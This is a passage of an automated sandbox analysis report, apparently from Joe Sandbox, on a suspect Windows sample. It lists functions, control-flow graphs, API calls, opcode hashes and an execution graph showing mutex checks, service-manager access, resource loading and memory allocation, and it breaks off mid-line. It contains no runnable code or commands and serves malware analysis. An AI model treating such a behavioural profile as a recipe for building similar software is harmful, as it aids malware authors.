                                                    Function 00FC9450 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 200 fc9450-fc9b10 202 fc9b18-fc9b47 LoadLibraryExW 200->202 203 fc9b12-fc9b15 200->203 204 fc9b49-fc9b4f 202->204 205 fc9b50-fc9b6d 202->205 203->202 204->205
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FC9929,00000800,00000000,00000000), ref: 00FC9B3A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 6315d3c44bf03d8d8e6bb3b8de3fb39cddd0b93c9cb1394b459dec26361563bf
                                                    • Instruction ID: 504f07e6b4d4aa2fad92151e6bd1248eea50f3a515e4515a029e5fb55cb4ec61
                                                    • Opcode Fuzzy Hash: 6315d3c44bf03d8d8e6bb3b8de3fb39cddd0b93c9cb1394b459dec26361563bf
                                                    • Instruction Fuzzy Hash: C011F2B29042099BDB14CF9AD548BDEBBF4EB88324F14852EE519A7610C3B4A945CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FC9AC9 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 208 fc9ac9-fc9b10 209 fc9b18-fc9b47 LoadLibraryExW 208->209 210 fc9b12-fc9b15 208->210 211 fc9b49-fc9b4f 209->211 212 fc9b50-fc9b6d 209->212 210->209 211->212
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FC9929,00000800,00000000,00000000), ref: 00FC9B3A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: c75b649c219b99896a0b162fc0f5024cf5e4796cab2c3aa08643b56e735aad34
                                                    • Instruction ID: 228e12b6a0268cdc7a3b665da72b66e4a68f19a97078e45f80c8d8e968271470
                                                    • Opcode Fuzzy Hash: c75b649c219b99896a0b162fc0f5024cf5e4796cab2c3aa08643b56e735aad34
                                                    • Instruction Fuzzy Hash: E51114B6D002099FCB10CF9AD548BDEFBF4EB88324F14852ED419A7210C3B5AA45CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FC9840 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 215 fc9840-fc9888 216 fc988a-fc988d 215->216 217 fc9890-fc98bb GetModuleHandleW 215->217 216->217 218 fc98bd-fc98c3 217->218 219 fc98c4-fc98d8 217->219 218->219
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00FC98AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 032b0958ed2b7c4058d005472e8aa62d3f2bcd50c5f8a2bec27a8cb6a934d566
                                                    • Instruction ID: 4acb6e7be5c132a3d69c901a434d8748b8e59ccaf0abd42480729516a74c4c0b
                                                    • Opcode Fuzzy Hash: 032b0958ed2b7c4058d005472e8aa62d3f2bcd50c5f8a2bec27a8cb6a934d566
                                                    • Instruction Fuzzy Hash: EC1143B1C002098FDB10CF9AD548BDEFBF4EF88324F14852AD429A7250D3B5A545CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FC9848 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 221 fc9848-fc9888 222 fc988a-fc988d 221->222 223 fc9890-fc98bb GetModuleHandleW 221->223 222->223 224 fc98bd-fc98c3 223->224 225 fc98c4-fc98d8 223->225 224->225
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00FC98AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 80d20d195712cb6174604fc2b3b14e469257803002a896c7d69237cd75557854
                                                    • Instruction ID: 69e9354ad8fe2ecfc472df87487adf0db301de7b24968e9ed791f347276ccc67
                                                    • Opcode Fuzzy Hash: 80d20d195712cb6174604fc2b3b14e469257803002a896c7d69237cd75557854
                                                    • Instruction Fuzzy Hash: A91122B1C002098FDB20CF9AC948BDEFBF4EF89324F14852AD419A7650C3B5A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FCDDC4 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 227 fcddc4-fcddcb 228 fcff00-fcff6a SetWindowLongW 227->228 229 fcff6c-fcff72 228->229 230 fcff73-fcff87 228->230 229->230
                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00FCFEE8,?,?,?,?), ref: 00FCFF5D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: 47e356d7eff057e7ff9f13da9d281e337155b2ff9d97a8c112d7858745026eaa
                                                    • Instruction ID: 22685403550b228e4823f8e3309758b82db0737e8e417e4830f1fedcb460222d
                                                    • Opcode Fuzzy Hash: 47e356d7eff057e7ff9f13da9d281e337155b2ff9d97a8c112d7858745026eaa
                                                    • Instruction Fuzzy Hash: 9B1136B58002099FDB10CF99D985BDEFBF8EB49324F20851AE955A3300C3B4A944CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FCFEF8 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 232 fcfef8-fcff6a SetWindowLongW 233 fcff6c-fcff72 232->233 234 fcff73-fcff87 232->234 233->234
                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00FCFEE8,?,?,?,?), ref: 00FCFF5D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: 105537769245ff023920603b2a3ad1c9509bf2136b868ff67665caffbe6e7ef4
                                                    • Instruction ID: e082c80f5295ad821f6f64d10b89e65e83c3f53933af08eaac98ee83c0380ef4
                                                    • Opcode Fuzzy Hash: 105537769245ff023920603b2a3ad1c9509bf2136b868ff67665caffbe6e7ef4
                                                    • Instruction Fuzzy Hash: DB1106B58006099FDB10CF99D985BDEFBF4EB48324F14851AD559A3640C374A944CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 00FCE530 Relevance: .3, Instructions: 315COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 704f761996717b7f63a87cbba5d6d7d04462fb7a9479ec19f73e734077aeed16
                                                    • Instruction ID: cee37b4ea92e37ddc9b7a1f1f4be71a6f38c62ca5c88d575a1fdd0b92e9368f5
                                                    • Opcode Fuzzy Hash: 704f761996717b7f63a87cbba5d6d7d04462fb7a9479ec19f73e734077aeed16
                                                    • Instruction Fuzzy Hash: CF12B8F1C91766CAE710CF65E89C18A3BA1F745328FD14A08E3611BAD1DBB8916BCF44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FCC0E4 Relevance: .3, Instructions: 265COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2992445b1933132233043f580b1da0cff7cfa9e54fa977ef65e5817919e5e59
                                                    • Instruction ID: 7051bc77d918b78560ff1dc5452d941fccf70cb81d07ffed83c0acbba410f3ad
                                                    • Opcode Fuzzy Hash: b2992445b1933132233043f580b1da0cff7cfa9e54fa977ef65e5817919e5e59
                                                    • Instruction Fuzzy Hash: 9DA17136E0021A8FCF05DFA5C945ADEB7B2FF85304B15857AE805AB262DB35E905DF80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FCE520 Relevance: .2, Instructions: 223COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 62e261355dbee219cc5b41115a99f991ec1b4b6e3925f6f0a802f0caf13190d7
                                                    • Instruction ID: 8f49bff3b2c66b37c42066d2f19217cb92e210f38d84a8e5c240559fbf50ae4b
                                                    • Opcode Fuzzy Hash: 62e261355dbee219cc5b41115a99f991ec1b4b6e3925f6f0a802f0caf13190d7
                                                    • Instruction Fuzzy Hash: C3C10BF1C51766CAD710DF65E89C18A7BB1FB45328F914A08E2612B6D0DFB8906BCF84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:5.2%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:12.6%
                                                    Total number of Nodes:1369
                                                    Total number of Limit Nodes:47
                                                    execution_graph 37069 454600 37070 45460b 37069->37070 37072 454628 37069->37072 37073 45288c 37070->37073 37074 452897 37073->37074 37075 4528a1 37073->37075 37074->37075 37079 4523c0 37074->37079 37075->37072 37078 4523c0 17 API calls 37078->37075 37082 4523a8 37079->37082 37083 4523b1 37082->37083 37086 4528e8 37083->37086 37085 4523be 37085->37078 37087 4529da 37086->37087 37088 4528ff 37086->37088 37087->37085 37088->37087 37089 45295f 37088->37089 37090 452939 37088->37090 37094 452997 37089->37094 37095 452971 37089->37095 37091 4524f4 17 API calls 37090->37091 37092 45294b 37091->37092 37093 4524f4 17 API calls 37092->37093 37098 45295d 37093->37098 37103 4524f4 37094->37103 37096 4524f4 17 API calls 37095->37096 37099 452983 37096->37099 37098->37085 37101 4524f4 17 API calls 37099->37101 37100 4529a9 37102 4524f4 17 API calls 37100->37102 37101->37098 37102->37098 37104 45251a 37103->37104 37109 4523ec 37104->37109 37106 45259b 37113 452270 16 API calls 37106->37113 37108 4525cc 37108->37100 37111 452429 37109->37111 37114 424950 37111->37114 37112 4524ce 37112->37106 37113->37108 37115 424954 GetSysColor 37114->37115 37116 42495f 37114->37116 37115->37116 37116->37112 37117 45f1c0 37127 417608 13 API calls 37117->37127 37119 45f1f2 37120 45f1f6 37119->37120 37121 45f1ff 37119->37121 37128 45d2f8 SHGetSpecialFolderLocation 37120->37128 37129 45d324 8 API calls 37121->37129 37123 45f1fb 37130 4049c0 37123->37130 37127->37119 37128->37123 37129->37123 37131 4049e1 37130->37131 37132 4049c6 37130->37132 37132->37131 37134 40277c 12 API calls 37132->37134 37134->37131 37135 435304 37138 435634 WinHelpA 37135->37138 37137 43530e 37138->37137 37139 402188 37140 40219c 37139->37140 37141 4021ce RtlEnterCriticalSection 37140->37141 37142 4021d8 37140->37142 37145 4021ad 37140->37145 37141->37142 37142->37145 37148 402094 37142->37148 37144 4022e0 37146 402303 37144->37146 37147 4022f9 RtlLeaveCriticalSection 37144->37147 37147->37146 37150 4020a4 37148->37150 37149 4020d0 37149->37144 37150->37149 37152 402008 37150->37152 37155 40185c 37152->37155 37154 402018 37154->37150 37158 401878 37155->37158 37157 401882 37164 401748 37157->37164 37158->37157 37161 4018d3 37158->37161 37163 40188e 37158->37163 37168 4015b4 37158->37168 37176 4014b0 LocalAlloc 37158->37176 37177 401690 VirtualFree 37161->37177 37163->37154 37166 40178e 37164->37166 37165 4017be 37165->37163 37166->37165 37167 4017aa VirtualAlloc 37166->37167 37167->37165 37167->37166 37169 4015c3 VirtualAlloc 37168->37169 37171 4015f0 37169->37171 37172 401613 37169->37172 37178 401468 LocalAlloc 37171->37178 37172->37158 37174 4015fc 37174->37172 37175 401600 VirtualFree 37174->37175 37175->37172 37176->37158 37177->37163 37178->37174 37179 49a3e0 37180 49a5b3 37179->37180 37181 49a403 37179->37181 37182 4967d4 12 API calls 37180->37182 37234 4967d4 37181->37234 37184 49a5bf 37182->37184 37565 49a098 167 API calls 37184->37565 37185 49a40f 37238 4738bc 37185->37238 37188 49a443 37245 477ad8 37188->37245 37194 49a4fd 37292 47423c 37194->37292 37195 49a46a 37195->37194 37197 49a487 OpenMutexA 37195->37197 37197->37194 37199 49a49a CloseHandle 37197->37199 37222 49a4c1 37199->37222 37200 49a511 37301 498684 37200->37301 37201 49a5a5 37564 45a800 PostQuitMessage 37201->37564 37205 49a4aa OpenMutexA 37551 4737b0 GetTempPathA 37205->37551 37209 402b68 23 API calls 37209->37222 37212 49a52a 37525 498998 37212->37525 37213 49a536 37556 409780 13 API calls 37213->37556 37217 49a542 37557 409780 13 API calls 37217->37557 37220 49a54f 37558 409780 13 API calls 37220->37558 37222->37194 37222->37199 37222->37205 37222->37209 37552 404a14 12 API calls 37222->37552 37553 409a48 37222->37553 37223 49a55c 37559 409780 13 API calls 37223->37559 37225 49a569 37560 409780 13 API calls 37225->37560 37227 49a576 37561 409780 13 API calls 37227->37561 37229 49a583 37562 409780 13 API calls 37229->37562 37231 49a590 37563 49a098 167 API calls 37231->37563 37233 49a531 37566 4049e4 37233->37566 37235 4967e6 37234->37235 37236 4049c0 12 API calls 37235->37236 37237 496846 37236->37237 37237->37185 37239 4738cc 37238->37239 37240 4738e4 37239->37240 37242 4738f7 OpenSCManagerA 37239->37242 37241 4049c0 12 API calls 37240->37241 37244 473921 37241->37244 37242->37240 37243 473906 CloseServiceHandle 37242->37243 37243->37240 37244->37188 37246 477ae1 37245->37246 37247 477b17 FindResourceA 37246->37247 37248 477b32 37247->37248 37281 477b29 37247->37281 37251 402b68 23 API calls 37248->37251 37249 4049e4 12 API calls 37250 477da5 37249->37250 37253 4049c0 12 API calls 37250->37253 37252 477b55 37251->37252 37570 404d40 37252->37570 37254 477dad 37253->37254 37282 402b68 37254->37282 37256 477b70 37257 409a48 FindFirstFileA FindClose FileTimeToLocalFileTime FileTimeToDosDateTime 37256->37257 37258 477b86 37257->37258 37259 477c32 37258->37259 37260 477b8e 37258->37260 37261 474c10 16 API calls 37259->37261 37263 41e0d0 17 API calls 37260->37263 37262 477c3d 37261->37262 37264 409a90 SetFileAttributesA GetLastError 37262->37264 37268 477bb0 37262->37268 37263->37268 37270 477c52 37264->37270 37265 409a90 SetFileAttributesA GetLastError 37266 477d28 37265->37266 37267 472ef0 12 API calls 37266->37267 37269 477d30 37267->37269 37268->37265 37272 477d3f 37269->37272 37273 477d5d 37269->37273 37271 41e0d0 17 API calls 37270->37271 37280 477c7c 37271->37280 37274 47475c 24 API calls 37272->37274 37275 47475c 24 API calls 37273->37275 37277 477d4d 37274->37277 37276 477d69 37275->37276 37278 473490 15 API calls 37276->37278 37279 473490 15 API calls 37277->37279 37278->37281 37279->37281 37280->37268 37281->37249 37283 4049c0 12 API calls 37282->37283 37284 402b7c 37283->37284 37285 402b80 GetModuleFileNameA 37284->37285 37286 402b9e GetCommandLineA 37284->37286 37602 404ab0 37285->37602 37290 402ba5 37286->37290 37291 402bbc 37290->37291 37607 402a1c 37290->37607 37291->37195 37293 474252 37292->37293 37623 406f90 CreateMutexA 37293->37623 37295 474274 GetLastError 37296 474286 37295->37296 37297 474282 37295->37297 37296->37297 37298 474290 CloseHandle 37296->37298 37299 4049c0 12 API calls 37297->37299 37298->37297 37300 4742ab 37299->37300 37300->37200 37300->37201 37302 49868c 37301->37302 37302->37302 37303 4738bc 14 API calls 37302->37303 37304 4986ab 37303->37304 37624 4747d8 37304->37624 37311 404a14 12 API calls 37312 4986e4 37311->37312 37646 4736a4 37312->37646 37314 4986fc 37315 49875f 37314->37315 37757 409a58 37314->37757 37652 472ef0 37315->37652 37318 498767 37322 49879d 37318->37322 37323 498776 37318->37323 37320 49870e 37321 404a14 12 API calls 37320->37321 37324 49871b 37321->37324 37690 4730fc 37322->37690 37761 4737d8 GetSystemDirectoryA 37323->37761 37329 404a14 12 API calls 37324->37329 37328 49877e 37331 404d40 12 API calls 37328->37331 37332 498733 37329->37332 37330 404d40 12 API calls 37333 49875d 37330->37333 37331->37333 37334 404ccc 12 API calls 37332->37334 37723 404ccc 37333->37723 37336 498748 37334->37336 37338 404ccc 12 API calls 37336->37338 37337 4987da 37339 4967d4 12 API calls 37337->37339 37338->37333 37340 4987e4 37339->37340 37341 404ccc 12 API calls 37340->37341 37342 4987f7 37341->37342 37343 4967d4 12 API calls 37342->37343 37344 498801 37343->37344 37345 404ccc 12 API calls 37344->37345 37346 498814 37345->37346 37347 4967d4 12 API calls 37346->37347 37348 49881e 37347->37348 37349 404ccc 12 API calls 37348->37349 37350 498831 37349->37350 37351 4967d4 12 API calls 37350->37351 37352 49883b 37351->37352 37745 409878 37352->37745 37354 49884a 37355 404ccc 12 API calls 37354->37355 37356 49885a 37355->37356 37357 4967d4 12 API calls 37356->37357 37358 498864 37357->37358 37359 404ccc 12 API calls 37358->37359 37360 498877 37359->37360 37361 4967d4 12 API calls 37360->37361 37362 498881 37361->37362 37363 4049e4 12 API calls 37362->37363 37364 49889b 37363->37364 37365 498f04 37364->37365 37366 498f0c 37365->37366 37366->37366 37814 430f3c 37366->37814 37368 498f48 37369 4747d8 18 API calls 37368->37369 37370 498f66 37369->37370 37820 494a8c 37370->37820 37374 498fb3 37375 404a14 12 API calls 37374->37375 37376 498fe3 37375->37376 37377 404a14 12 API calls 37376->37377 37378 499014 37377->37378 37379 404a14 12 API calls 37378->37379 37380 499045 37379->37380 37381 404a14 12 API calls 37380->37381 37382 499076 37381->37382 37383 404a14 12 API calls 37382->37383 37384 4990a7 37383->37384 37385 404a14 12 API calls 37384->37385 37386 4990d8 37385->37386 37387 404a14 12 API calls 37386->37387 37388 499109 37387->37388 37389 404a14 12 API calls 37388->37389 37390 49913a 37389->37390 37391 404a14 12 API calls 37390->37391 37392 49916b 37391->37392 37393 404a14 12 API calls 37392->37393 37394 49919c 37393->37394 37395 404a14 12 API calls 37394->37395 37396 4991cd 37395->37396 37397 404a14 12 API calls 37396->37397 37398 4991fe 37397->37398 37399 404a14 12 API calls 37398->37399 37400 49922f 37399->37400 37401 404a14 12 API calls 37400->37401 37402 499260 37401->37402 37403 404a14 12 API calls 37402->37403 37404 49929d 37403->37404 37405 404a14 12 API calls 37404->37405 37406 4992da 37405->37406 37407 404a14 12 API calls 37406->37407 37408 499317 37407->37408 37409 404a14 12 API calls 37408->37409 37410 499354 37409->37410 37411 404a14 12 API calls 37410->37411 37412 499391 37411->37412 37413 404a14 12 API calls 37412->37413 37414 4993ce 37413->37414 37415 404a14 12 API calls 37414->37415 37416 49940b 37415->37416 37417 404a14 12 API calls 37416->37417 37418 499448 37417->37418 37419 404a14 12 API calls 37418->37419 37420 499485 37419->37420 37421 404a14 12 API calls 37420->37421 37422 4994c2 37421->37422 37423 404a14 12 API calls 37422->37423 37424 4994ff 37423->37424 37425 404a14 12 API calls 37424->37425 37426 49953c 37425->37426 37427 404a14 12 API calls 37426->37427 37428 499579 37427->37428 37429 404a14 12 API calls 37428->37429 37430 4995b6 37429->37430 37431 404a14 12 API calls 37430->37431 37432 4995f6 37431->37432 37433 404a14 12 API calls 37432->37433 37434 499636 37433->37434 37435 404a14 12 API calls 37434->37435 37436 49966c 37434->37436 37435->37436 37437 404a14 12 API calls 37436->37437 37438 499685 37436->37438 37437->37438 37439 404a14 12 API calls 37438->37439 37440 49969e 37438->37440 37439->37440 37441 404a14 12 API calls 37440->37441 37442 4996b7 37440->37442 37441->37442 37443 404a14 12 API calls 37442->37443 37444 4996d0 37442->37444 37443->37444 37445 404a14 12 API calls 37444->37445 37446 4996e9 37444->37446 37445->37446 37447 404a14 12 API calls 37446->37447 37448 499702 37446->37448 37447->37448 37449 404a14 12 API calls 37448->37449 37450 49971b 37448->37450 37449->37450 37451 404a14 12 API calls 37450->37451 37452 499734 37450->37452 37451->37452 37453 404a14 12 API calls 37452->37453 37454 49974d 37452->37454 37453->37454 37455 404a14 12 API calls 37454->37455 37456 499766 37454->37456 37455->37456 37457 404a14 12 API calls 37456->37457 37458 49977f 37456->37458 37457->37458 37459 404a14 12 API calls 37458->37459 37460 499798 37458->37460 37459->37460 37461 404a14 12 API calls 37460->37461 37463 4997b7 37460->37463 37461->37463 37462 4997d6 37465 4049e4 12 API calls 37462->37465 37463->37462 37464 404a14 12 API calls 37463->37464 37464->37462 37466 49981b 37465->37466 37467 498b40 37466->37467 37468 498b48 37467->37468 37468->37468 37469 402b68 23 API calls 37468->37469 37470 498b6e 37469->37470 37471 498df1 37470->37471 37472 409a58 GetFileAttributesA 37470->37472 37473 4049e4 12 API calls 37471->37473 37477 498b9b 37472->37477 37475 498e25 37473->37475 37474 498bf6 37476 402b68 23 API calls 37474->37476 37475->37212 37475->37213 37478 498c22 37476->37478 37477->37474 37877 409f54 37477->37877 37479 404d40 12 API calls 37478->37479 37480 498c44 37479->37480 37880 473804 37480->37880 37484 498bc9 37945 409a90 37484->37945 37485 404d40 12 API calls 37487 498c75 37485->37487 37489 4967d4 12 API calls 37487->37489 37491 498c80 37489->37491 37490 404ccc 12 API calls 37492 498beb 37490->37492 37494 404d40 12 API calls 37491->37494 37493 4967d4 12 API calls 37492->37493 37493->37474 37495 498cc0 37494->37495 37496 409a48 4 API calls 37495->37496 37497 498cc8 37496->37497 37498 498d18 37497->37498 37499 404d40 12 API calls 37497->37499 37500 402b68 23 API calls 37498->37500 37501 498cea 37499->37501 37502 498d44 37500->37502 37892 474b04 37501->37892 37911 474948 37502->37911 37505 498cfa 37506 404ccc 12 API calls 37505->37506 37508 498d0d 37506->37508 37507 498d54 37509 498d74 37507->37509 37511 402b68 23 API calls 37507->37511 37510 4967d4 12 API calls 37508->37510 37512 498d87 37509->37512 37515 404a58 12 API calls 37509->37515 37510->37498 37514 498d64 37511->37514 37513 4738bc 14 API calls 37512->37513 37516 498d90 37513->37516 37517 474948 17 API calls 37514->37517 37515->37512 37518 404d40 12 API calls 37516->37518 37517->37509 37519 498daf 37518->37519 37938 47357c 37519->37938 37521 498dbb 37522 404d40 12 API calls 37521->37522 37523 498de6 37522->37523 37524 4967d4 12 API calls 37523->37524 37524->37471 37526 4989bd 37525->37526 37527 472ef0 12 API calls 37526->37527 37528 4989e6 37527->37528 37529 4989f9 37528->37529 37530 498a8f 37528->37530 37531 404d40 12 API calls 37529->37531 37532 404d40 12 API calls 37530->37532 37533 498a22 37531->37533 37534 498ab9 37532->37534 37985 473490 37533->37985 37536 473490 15 API calls 37534->37536 37538 498ac7 37536->37538 37541 498a40 37538->37541 37996 45a800 PostQuitMessage 37538->37996 37539 498a45 37546 404d40 12 API calls 37539->37546 37540 498a34 37994 45a800 PostQuitMessage 37540->37994 37544 4049e4 12 API calls 37541->37544 37545 498b05 37544->37545 37545->37233 37547 498a6f 37546->37547 37548 473490 15 API calls 37547->37548 37549 498a7d 37548->37549 37549->37541 37995 45a800 PostQuitMessage 37549->37995 37551->37222 37552->37222 37997 4099e0 37553->37997 37556->37217 37557->37220 37558->37223 37559->37225 37560->37227 37561->37229 37562->37231 37563->37233 37564->37233 37565->37233 37567 4049ea 37566->37567 37568 404a10 37567->37568 38003 40277c 12 API calls 37567->38003 37571 404d51 37570->37571 37572 404d77 37571->37572 37573 404d8e 37571->37573 37579 40500c 37572->37579 37585 404a84 37573->37585 37576 404d84 37577 404dbf 37576->37577 37590 404a14 37576->37590 37580 405019 37579->37580 37584 405049 37579->37584 37582 404a84 12 API calls 37580->37582 37583 405025 37580->37583 37581 4049c0 12 API calls 37581->37583 37582->37584 37583->37576 37584->37581 37586 404a88 37585->37586 37587 404aac 37585->37587 37596 40275c 37586->37596 37587->37576 37591 404a18 37590->37591 37592 404a28 37590->37592 37591->37592 37594 404a84 12 API calls 37591->37594 37593 404a56 37592->37593 37601 40277c 12 API calls 37592->37601 37593->37577 37594->37592 37597 402761 37596->37597 37599 402774 37596->37599 37597->37599 37600 40286c 12 API calls 37597->37600 37599->37576 37600->37599 37601->37593 37603 404a84 12 API calls 37602->37603 37604 404ac0 37603->37604 37605 4049c0 12 API calls 37604->37605 37606 402b9c 37605->37606 37606->37291 37608 402a2e 37607->37608 37609 402a26 CharNextA 37608->37609 37614 402a48 37608->37614 37609->37608 37610 402a97 37613 40500c 12 API calls 37610->37613 37611 402a52 CharNextA 37611->37614 37612 402a83 CharNextA 37612->37614 37622 402aa0 37613->37622 37614->37610 37614->37611 37614->37612 37615 402a5c CharNextA 37614->37615 37616 402a79 CharNextA 37614->37616 37615->37614 37616->37614 37617 402aff 37617->37290 37618 402ae4 CharNextA 37618->37622 37619 402aac CharNextA 37619->37622 37620 402ab6 CharNextA 37620->37622 37621 402ada CharNextA 37621->37622 37622->37617 37622->37618 37622->37619 37622->37620 37622->37621 37622->37622 37623->37295 37625 4747eb 37624->37625 37626 474803 FindResourceA 37625->37626 37627 474856 37626->37627 37628 474813 37626->37628 37629 404a14 12 API calls 37627->37629 37762 41e0d0 37628->37762 37637 47484a 37629->37637 37631 47482b 37634 40500c 12 API calls 37631->37634 37632 4049c0 12 API calls 37633 474877 37632->37633 37638 409628 37633->37638 37635 47483c 37634->37635 37766 404ed8 37635->37766 37637->37632 37639 409638 37638->37639 37640 409659 37639->37640 37785 408c7c 13 API calls 37639->37785 37642 4094ec 37640->37642 37643 4094fc 37642->37643 37644 404ab0 12 API calls 37643->37644 37645 409504 37644->37645 37645->37311 37647 4736c0 37646->37647 37648 404ccc 12 API calls 37647->37648 37649 47372a 37648->37649 37786 432298 37649->37786 37651 473745 37651->37314 37653 4094ec 12 API calls 37652->37653 37654 472f1c 37653->37654 37655 4094ec 12 API calls 37654->37655 37656 472f33 37655->37656 37657 404d40 12 API calls 37656->37657 37658 472f47 37657->37658 37659 472f53 37658->37659 37660 472f62 37658->37660 37661 472f56 37659->37661 37662 472fb0 37659->37662 37663 472f6e 37660->37663 37664 472f7d 37660->37664 37670 473003 37661->37670 37671 472ff9 37661->37671 37674 472f5d 37661->37674 37665 472fc3 37662->37665 37666 472fbc 37662->37666 37667 472f73 37663->37667 37668 472f8e 37663->37668 37669 404a14 12 API calls 37664->37669 37675 404a14 12 API calls 37665->37675 37672 472fd1 37666->37672 37673 472fbe 37666->37673 37667->37674 37678 404a14 12 API calls 37667->37678 37676 404a14 12 API calls 37668->37676 37669->37674 37681 404a14 12 API calls 37670->37681 37679 473011 37671->37679 37680 472ffb 37671->37680 37682 404a14 12 API calls 37672->37682 37673->37674 37687 404a14 12 API calls 37673->37687 37677 4049e4 12 API calls 37674->37677 37675->37674 37676->37674 37683 473053 37677->37683 37678->37674 37686 404a14 12 API calls 37679->37686 37684 47301f 37680->37684 37685 472ffe 37680->37685 37681->37674 37682->37674 37683->37318 37688 404a14 12 API calls 37684->37688 37685->37674 37689 404a14 12 API calls 37685->37689 37686->37674 37687->37674 37688->37674 37689->37674 37691 473139 37690->37691 37692 4732b4 SHGetSpecialFolderLocation SHGetPathFromIDList 37691->37692 37693 